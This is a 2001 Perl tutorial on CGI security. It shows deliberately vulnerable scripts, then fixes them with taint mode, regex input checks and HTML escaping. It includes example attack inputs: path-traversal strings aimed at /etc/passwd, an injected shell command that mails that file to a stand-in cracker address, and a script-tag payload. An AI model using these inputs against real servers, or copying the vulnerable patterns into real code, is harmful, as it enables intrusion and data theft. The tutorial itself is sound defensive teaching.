Despite valiant attempts by the marketing departments of Microsoft and Sun, CGI is still the most commonly used architecture for creating dynamic content on the World Wide Web. In this series of tutorials we’ll look at how to write CGI programs. The second tutorial in the series looks at some of the security issues in CGI programming.
This article was originally published by Linux Format in May 2001.
Please note that these tutorials are only left here for historical interest. If you are writing new web applications with Perl these days, you should be considering something based on PSGI and Plack or even something using raw PSGI.
Introduction
Running a CGI program on a web server that is connected to the Internet is actually quite a brave thing to do. You’re giving anyone with an Internet connection permission to run a program on your server. You’d better be very sure that the program is secure and that it won’t allow anyone to do anything that you don’t want them to be able to do. This is an area where many beginners’ CGI tutorials are very weak and as a result there are a large number of web servers that are open to attack from crackers through CGI programs. I don’t want to give the impression that CGI is inherently insecure. It is no more insecure than any other web technology and it’s probably easier to make CGI secure. I just want to make the point that you need to consider security.
What can possibly go wrong?
Before looking at how we can increase the security of our CGI programs, let’s just look at a few examples of what can go wrong.
In the first example you have a simple CGI script that gets the name of a file as a parameter and displays that file in the browser. A first attempt at writing this program might look like this.
    #!/usr/bin/perl -w

    use strict;
    use CGI ':standard';

    my $file = param('filename');

    print header(-type => 'text/plain');

    open FILE, $file or die "Can't open $file: $!\n";

    while (<FILE>) {
      print;
    }
In this case we’re assuming that the ‘filename’ parameter will contain the full path to the file we want to display. I hope it’s obvious why this is a very bad idea. What would happen if someone passed you a filename of “/etc/passwd”? They would get the contents of this file displayed on their browser. Now, I realise that the actual passwords in this file are encrypted, but they will see all of your usernames which gives them a foothold if they are trying to break into your server. And they can run something like “crack” against the password list to see if any of the passwords are particularly weak. All in all a bad idea. And remember that they can see any file on your system in the same way.
So here’s a second version of the script. In this one we assume that the files we want to display are all in the same directory and we’ll restrict the viewer to displaying files from that directory. Or, at least, that’s the plan.
    #!/usr/bin/perl -w

    use strict;
    use CGI ':standard';

    my $dir = '/path/to/data/files/';
    my $file = $dir . param('filename');

    print header(-type => 'text/plain');

    open FILE, $file or die "Can't open $file: $!\n";

    while (<FILE>) {
      print;
    }
At first this looks a lot more secure, but it isn’t. True, a cracker can’t use a filename of ‘/etc/passwd’. But what about ‘../../etc/passwd’ or ‘../../../../etc/passwd’ or whatever is needed to go back up the directory tree to find the file? We need to be far more careful about what data we accept from the user.
In the second example we want to display information about the users who are currently logged on to the server. For this we’ll run the Unix “finger” command, capture the output and display it in the browser. The name of the user to run “finger” against is passed in a parameter. Here’s the basic program (it’s very simple).
    #!/usr/bin/perl -w

    use strict;
    use CGI ':standard';

    my $user = param('user');

    my $who = `finger $user`;

    print header(-type => 'text/plain');
    print "Here are the results for user $user\n\n";
    print $who;
Again, this is an obvious technique for getting the information back from a Unix command. But consider what might happen if the data passed in the ‘user’ parameter was “dcross; mail cracker@blackhat.com < /etc/passwd”. The backticks in the program will simply pass the whole string to your shell. The “finger” command will be executed as intended, but the “mail” command will also run, which is probably not something that you want.
The last security nightmare that we’ll look at now involves something called “cross-site scripting” attacks. This problem again comes from being too trusting of our input data. In last month’s article we wrote a simple script which prompted the user for input and wrote an HTML page displaying the data that they had given us. One of the input fields that we used was a text input field which allowed the user to post any data that they wanted as their name. We then displayed that name (twice) as part of the data on the resulting page. Of course as long as people were just entering their name in this field there would be no problem, but see what happens when I enter my name as “Dave Cross<script>alert('Gotcha!')</script>”. As the picture shows, the JavaScript code that we’ve added to the name gets executed as the name is displayed. In this case the JavaScript is harmless but it’s quite possible that it could do a lot of damage. There was a good article on this subject on perl.com recently called “Preventing Cross-site Scripting Attacks”.
For another example of a very real security problem that CGI programs can cause see the box on “Spam Attacks using FormMail” which explains how a well-known CGI program has been hijacked by spammers to send unauthorised emails.
Trust No-One
We’ve now seen a number of ways that CGI programs can be vulnerable to attack from users. How can we protect ourselves from these dangers? The most important thing that you can do is to take a leaf out of Agent Mulder’s book and “Trust No-One”. Never assume anything about the data that you receive from a user. Always put it through the most rigorous checks before using it.
As an example, let’s go back to the file display example. You’ll remember that our major problem here was to prevent a cracker from displaying our /etc/passwd file. One solution that I often hear is that we could create a form which contains a drop-down menu listing all of the files that the user is allowed to see. It would be simple enough to build this list using Perl code like this:
    opendir DIR, '/path/to/files' or die $!;

    print qq(<select name="file" size="1">\n);

    while (my $file = readdir(DIR)) {
      next if $file =~ /^\./; # skip '.', '..' and hidden files
      print qq(<option>$file</option>\n);
    }

    print qq(</select>\n);
Anyone using this drop-down menu would only be able to choose one of the files that we wanted them to choose, so surely that solves the problem. Well, no, this version is just as unsafe as the previous versions. The key phrase is “anyone using this drop-down menu”. You have no guarantee that the request that goes to your CGI program has been generated from your form. Someone could copy the HTML from your form, alter it to allow them to enter whatever data they want and submit that request to your CGI program. Or they could even write a simple program that allowed them to create any HTTP request they want and submit that to your CGI program (Perl is a particularly good language for writing programs like that!).
So the upshot of all that is that you cannot use a cleverly designed form to protect your program. You have to assume that you’re always dealing with potentially dangerous data and handle it accordingly. Perl (of course) makes it easy to do this.
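One way to act on this is to repeat the form’s restriction on the server: accept a submitted name only if it is exactly one of the entries the drop-down would have listed. The sketch below is not from the original article; the helper name `is_listed_file` is hypothetical, and it assumes the permitted files are the plain, non-hidden files in a single directory.

```perl
use strict;
use warnings;

# Hypothetical helper: true only if $name is exactly one of the
# visible (non-dot) plain files in $dir.
sub is_listed_file {
    my ($dir, $name) = @_;
    return 0 unless defined $name;

    opendir(my $dh, $dir) or die "Can't open directory $dir: $!\n";
    my %listed = map { $_ => 1 }
                 grep { !/^\./ && -f "$dir/$_" } readdir $dh;
    closedir $dh;

    return $listed{$name} ? 1 : 0;
}

# A traversal attempt can never equal a directory entry, because
# readdir returns bare names without any slashes.
print is_listed_file('.', '../../etc/passwd') ? "allowed\n" : "refused\n";
```

Because the comparison is against the real directory contents rather than against anything the browser sent, a hand-built request gains nothing over the genuine form.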
The first (and most powerful) tool that Perl gives you is taint mode. When Perl is running in taint mode it automatically distrusts any data that it gets from the outside world and won’t let you use that data in many ways until you clean it up. You turn taint mode on by adding “-T” to your shebang line. Here’s an example of a simple (non-CGI) program which demonstrates how taint mode works.
    #!/usr/bin/perl -Tw
    use strict;

    print 'Enter command: ';
    my $cmd = <STDIN>;
    chomp $cmd;
    print `$cmd`;
In this program we prompt the user for a Unix command and print out the result of running that command. If you try to run this program and type in any command (for example “ls”) when prompted, then you’ll see this error:
    Insecure dependency in `` while running with -T switch at ./taint.pl line 7, <STDIN> line 1.
This is Perl’s way of telling you that you tried to do something potentially dangerous with some tainted data. In this case we tried to pass a string to the Unix shell (using the backticks) without checking that the data only contained things that we want to pass to the shell.
The next thing that we need to know, of course, is how to go about cleaning the data. You do this using regular expressions. Here is our previous program rewritten to be taint-safe.
    #!/usr/bin/perl -Tw

    use strict;

    $ENV{PATH} = '/bin:/usr/bin:/usr/local/bin';

    print "Enter command: ";
    my $cmd = <STDIN>;
    chomp $cmd;

    if ($cmd =~ m|^([\w /\-]+)$|) {
      $cmd = $1;
    } else {
      die "Bad command: $cmd\n";
    }

    print `$cmd`;
There are two changes in this version. Firstly we’ve set the path to a known value. This is because Perl in taint mode distrusts the user’s own path as it could potentially have been set to a dangerous value. Secondly we examine the contents of $cmd before calling the shell. We check that the data in $cmd contains only a specific set of characters. That set includes only word characters (alphanumerics and the underscore), spaces, a slash and a dash. This allows commands like “ls”, “ls -l” and “ls -l /home/dave” but excludes multiple commands like “ls; who”. Depending on your specific application the exact set of allowed characters may be different, but you should always keep the set as small as possible.
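PATH is not the only environment variable that can influence a shell. The “perlsec” manual page also suggests deleting a handful of others before running external commands. The fragment below is a small sketch of that set-up step on its own. The PATH value is the one used in this article, and you should adjust it to your own system.

```perl
use strict;
use warnings;

# Give child processes a fixed, known search path.
$ENV{PATH} = '/bin:/usr/bin:/usr/local/bin';

# Remove variables that can change how a shell behaves
# (the list suggested in perlsec).
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

print "PATH is now $ENV{PATH}\n";
```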
Having checked that $cmd contains only our allowed characters we use a set of capturing parentheses to extract the value into $1 and then reassign this value to $cmd. It is this action which untaints $cmd. From this point onwards we can be sure that $cmd only contains the data that we want it to contain. Perl also knows this and we can happily pass our data to the shell without generating an error. If $cmd contains invalid characters then the regular expression match will fail and the program dies with an error message.
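The check-and-capture step can be wrapped in a small function so that it is easy to reuse and to try out against sample input. This is only a sketch: the name `untaint_command` is hypothetical, and the pattern is the one from the program above. It behaves the same way whether or not taint mode is switched on, although only under “-T” does the capture actually clear a taint flag.

```perl
use strict;
use warnings;

# Hypothetical helper: returns the validated command, or undef if the
# input contains anything outside the allowed character set.
sub untaint_command {
    my ($input) = @_;
    return unless defined $input;
    # Word characters, spaces, slashes and dashes only.
    return $input =~ m|^([\w /\-]+)$| ? $1 : undef;
}

for my $try ('ls -l /home/dave', 'ls; who') {
    my $clean = untaint_command($try);
    print defined $clean ? "accepted: $clean\n" : "rejected: $try\n";
}
```

Returning undef rather than dying leaves it to the caller to decide how to report the bad input.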
If you need some revision on Perl’s regular expressions then you should look at the “perlre” manual page that was installed when you installed Perl. For more information than you’ll ever really need, see the book “Mastering Regular Expressions” by Jeffrey Friedl.
Now we know about taint mode, we can use this knowledge to write a safer version of our “finger” program.
    #!/usr/bin/perl -wT

    use strict;
    use CGI ':standard';

    $ENV{PATH} = '/bin:/usr/bin:/usr/local/bin';

    my $user = param('user');

    if ($user =~ /^(\w+)$/) {
      $user = $1;
    } else {
      die "Invalid user: $user\n";
    }

    my $who = `finger $user`;

    print header(-type => 'text/plain');
    print "Here are the results for user $user\n\n";
    print $who;
We’ve made very similar changes to this program as we did to the previous program. We’ve set the PATH to a known value and we’ve untainted the value in $user by checking it with a regular expression. Notice that in this case we can be far more strict in the set of allowed characters. As we’re just looking for a user name we can just look for one or more word characters. The next figure shows the results of running this program on my local web server passing it the username “dave”.
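A complementary precaution, which the program above does not use, is to avoid the shell altogether. When Perl’s `open` is given the mode '-|' followed by a list, the command and its arguments are handed to the program directly, so characters like “;” have no special meaning. The sketch below assumes a hypothetical helper called `run_without_shell`, and it uses perl itself (`$^X`) as the external command so that it does not depend on “finger” being installed.

```perl
use strict;
use warnings;

# Hypothetical helper: run a command with its arguments passed as a list,
# so no shell ever parses them, and return everything it prints.
sub run_without_shell {
    my @command = @_;
    open(my $pipe, '-|', @command)
        or die "Can't run $command[0]: $!\n";
    local $/;                 # read all of the output in one go
    my $output = <$pipe>;
    close $pipe;
    return $output;
}

# The hostile value arrives in the child as a single, literal argument.
my $hostile = 'dave; echo injected';
print run_without_shell($^X, '-e', 'print "argument was: $ARGV[0]\n"', $hostile);
```

In the “finger” program the equivalent call would be something like `run_without_shell('finger', $user)`. It is best treated as an extra layer on top of the regular expression check, not a replacement for it.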
For more information about taint mode, see the “perlsec” manual page that came with your version of Perl.
Other Safety Nets
Having fixed the problem with our “finger” example, let’s take a look at how we’d solve the other problems we looked at earlier, starting with the file display script. To reiterate the problem, we have a directory that contains text files which we want to display to the user without them also being able to view our /etc/passwd file.
The solution to this is very similar to the solution to our previous problem. We simply use a regular expression that matches our idea of what a filename should be and refuse to do anything if we’re given anything that doesn’t match that. Here is the code:
    #!/usr/bin/perl -wT

    use strict;
    use CGI ':standard';

    my $dir = '/path/to/data/files/';
    my $file = param('filename');

    if ($file =~ /^(\w[\w\.]*)$/) {
      $file = $1;
    } else {
      die "Bad filename: $file\n";
    }

    print header(-type => 'text/plain');

    # Open the file inside the data directory, not relative to wherever
    # the script happens to be running.
    open FILE, "$dir$file" or die "Can't open $dir$file: $!\n";

    while (<FILE>) {
      print;
    }
The program takes a familiar form. Only the regular expression has changed. In this case we’re trying to prevent users from entering anything other than a plain filename within our data directory. We therefore insist that the filename starts with a word character which is optionally followed by any combination of word characters and dots. This allows filenames like “something.txt” or even “something.else.dat” but prevents “/something.txt” or (most importantly) things like “../../../etc/passwd”. Any time that you open a file with a name based on user input you should use these kinds of checks.
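To see which names the pattern lets through, it can help to pull the check into a function and run it against the examples just mentioned. This is a sketch only: `data_file_path` is a hypothetical name, and the directory is the same placeholder used in the program above.

```perl
use strict;
use warnings;

my $dir = '/path/to/data/files/';   # placeholder directory from the article

# Hypothetical helper: returns the full path for an acceptable name,
# or undef if the name fails the filename pattern.
sub data_file_path {
    my ($name) = @_;
    return unless defined $name;
    return $name =~ /^(\w[\w\.]*)$/ ? $dir . $1 : undef;
}

for my $try ('something.txt', 'something.else.dat',
             '/something.txt', '../../../etc/passwd') {
    my $path = data_file_path($try);
    print defined $path ? "ok:       $path\n" : "rejected: $try\n";
}

# An accepted path could then be opened explicitly for reading:
#   open(my $fh, '<', $path) or die "Can't open $path: $!\n";
```

The three-argument form of `open` shown in the final comment states the read-only mode separately from the filename, so nothing in the name can be mistaken for a mode character.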
Preventing Cross-Site Scripting Attacks
The final danger that we mentioned at the start of this article was that of cross-site scripting attacks where a user can insert JavaScript into data that you are going to display on a web page. Ways to get round this vary. If the data that you’re displaying shouldn’t contain any HTML at all then the brute force approach is to replace all ‘<’ characters with the ‘&lt;’ HTML entity before displaying it to the browser. Here’s how to make that change to last month’s form processing program.
    #!/usr/bin/perl -Tw

    use strict;
    use CGI ':standard';

    my $name = param('name');
    my $age = param('age');
    my $gender = param('gender');
    my @hobbies = param('hobby');

    my $list;

    if (@hobbies) {
      $list = join ', ', @hobbies;
    } else {
      $list = 'None';
    }

    $name =~ s/</&lt;/g;
    $age =~ s/</&lt;/g;
    $gender =~ s/</&lt;/g;
    $list =~ s/</&lt;/g;

    print header,
      start_html(-title=>$name),
      h1("Welcome $name"),
      p('Here are your details:'),
      table(Tr(td('Name:'), td($name)),
            Tr(td('Age:'), td($age)),
            Tr(td('Gender:'), td($gender)),
            Tr(td('Hobbies:'), td($list))),
      end_html;
It’s a very simple change. We’ve simply run the transformation s/</&lt;/g against all of the user input variables to remove any potentially dangerous HTML tags. Notice that we’ve done it to all input and not just the data that comes from a text field. This is because, as I said earlier, we can’t rely on the fact that the data has been entered via our form. Here’s the result of trying to run a cross-site scripting attack on our new program. Note the absence of embarrassing JavaScript pop-up windows.
If, however, you want to include the ability for users to enter HTML in their data then you have a lot more work on your hands. You would need to keep a list of allowed HTML tags and attributes. Then you would have to parse the user’s input to work out exactly what they have tried to enter and remove anything that is not allowed. This is far from trivial and I don’t have enough space in this article to go into any more detail. If you’d like to see an example of how it’s done, please take a look at the guestbook script from the nms project (see box about CGI script repositories).
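Replacing ‘<’ alone is the minimum. A slightly fuller version also escapes ‘&’, ‘>’ and both kinds of quote, which matters if the value ever ends up inside an HTML attribute. The function below is a hand-rolled sketch with a hypothetical name, `escape_html`. It is not part of the program above, and a module such as HTML::Entities offers `encode_entities` for the same job.

```perl
use strict;
use warnings;

# Hypothetical helper: escape the characters that are special in HTML.
sub escape_html {
    my ($text) = @_;
    return '' unless defined $text;
    $text =~ s/&/&amp;/g;    # must come first, or later entities get re-escaped
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    $text =~ s/'/&#39;/g;
    return $text;
}

print escape_html(q{Dave Cross<script>alert('Gotcha!')</script>}), "\n";
```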
Conclusions
I hope I haven’t scared anyone away from CGI programming. These kinds of security issues exist no matter what kind of web technologies you use and they are actually easier to fix in CGI programs than they are in many other technologies.
CGI programming is fun and it is relatively easy to write programs that do interesting and useful stuff. You just have to be aware of everything that can possibly go wrong.
There are a number of good places to go to get more information on CGI security. One of the best is Lincoln Stein’s “WWW Security FAQ”.
In next month’s article we’ll look at some more advanced CGI concepts like using cookies to store user data and using templating systems to separate your HTML from your Perl code.
CGI Script Repositories
Most people who use CGI programs on their web sites don’t write the scripts that they use. There are a large number of sites on the Internet that provide free scripts to download and use. One of the most famous is called “Matt’s Script Archive” and it contains a number of scripts written by a programmer called Matt Wright. Scripts from Matt’s site are in use all over the World Wide Web.
However you should not make the mistake of thinking that popularity and quality are the same thing. It’s long been known amongst the Perl community that the scripts found in most CGI script repositories are of very variable quality. I wrote an article called “Finding CGI Scripts” for perl.com which goes into this issue in some detail. My conclusions were that the people who were most likely to use these scripts were exactly the people least likely to be able to judge the technical quality of the scripts and that this was leading to very insecure scripts being installed on a large number of web servers.
This is why the London Perl Mongers set up the nms project. The aims of this project are to provide a set of scripts which can be used in place of Matt Wright’s scripts. We didn’t choose Matt’s scripts because they were the worst, but simply because they were the most widely used.
The nms programs can be downloaded from http://nms-cgi.sourceforge.net. As I write we have replacements available for all of Matt’s scripts except wwwboard (which is a message board system) but I expect that to be available by the time you read this.
Spam Attacks using FormMail
One of the most popular CGI scripts on the World Wide Web is Matt Wright’s “FormMail”. This script allows you to take the results of an HTML form and have the data sent in an email to a specified recipient. This is a very common requirement and Matt’s script was one of the first freely available scripts to possess this functionality. Many ISPs automatically install this script on clients’ sites.
The problem with this script is that it takes the address that it sends the email to from a form input. This is usually a hidden field in the HTML form but, as we’ve seen, that won’t prevent a determined spammer from overriding that value and sending emails which originate from your server and annoy a large number of people.
This trick has apparently become very well-known amongst spammers and there are even automated “FormMail” detectors in existence which probe web sites looking for FormMail scripts that can be abused. The last eighteen months have seen a huge increase in the amount of spam email sent via unsecured FormMail scripts. Of course, this didn’t go unnoticed by Matt Wright and in July and August 2001 he released three new versions of the script in quick succession in an attempt to fix this problem.
Unfortunately the problem wasn’t completely fixed. Whilst the latest version (1.9) is much better, there are still ways to use it as a spam relay. The problems are described in detail at http://www.monkeys.com/anti-spam/formmail-advisory.pdf. It’s worth mentioning that this document is also uncomplimentary about the nms FormMail replacement but I should point out that since the document was written we have fixed all of the security holes in our script.
If you’re using FormMail on your site then you really shouldn’t be using Matt Wright’s version. You should use the nms version instead. If you want to see how bad the problem is then try putting a file called FormMail.pl in your cgi-bin directory which does nothing but log the date, time and query string each time it is called. I run a script like this on a few of my domains and I get between five and ten probes each day on each of these sites.
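A decoy of that kind needs only a few lines. The version below is a sketch and not the script I actually run: the helper name `log_probe` and the log file location are assumptions, and it only writes to the log when the web server has set the standard CGI variable GATEWAY_INTERFACE.

```perl
use strict;
use warnings;

# Hypothetical helper: append the date, time and query string to $logfile.
sub log_probe {
    my ($logfile) = @_;
    my $query = defined $ENV{QUERY_STRING} ? $ENV{QUERY_STRING} : '';
    $query =~ s/[\r\n]+/ /g;            # keep each probe on one log line
    open(my $log, '>>', $logfile) or die "Can't append to $logfile: $!\n";
    print {$log} scalar(localtime), "\t$query\n";
    close $log;
    return;
}

# Only act when running as a CGI program. The log path is an assumption;
# pick somewhere that the web server user is allowed to write.
if ($ENV{GATEWAY_INTERFACE}) {
    log_probe('/tmp/formmail-probes.log');
    print "Content-type: text/plain\n\n";
}
```

The script sends back an empty plain-text page, so a probing program learns nothing beyond the fact that something answered.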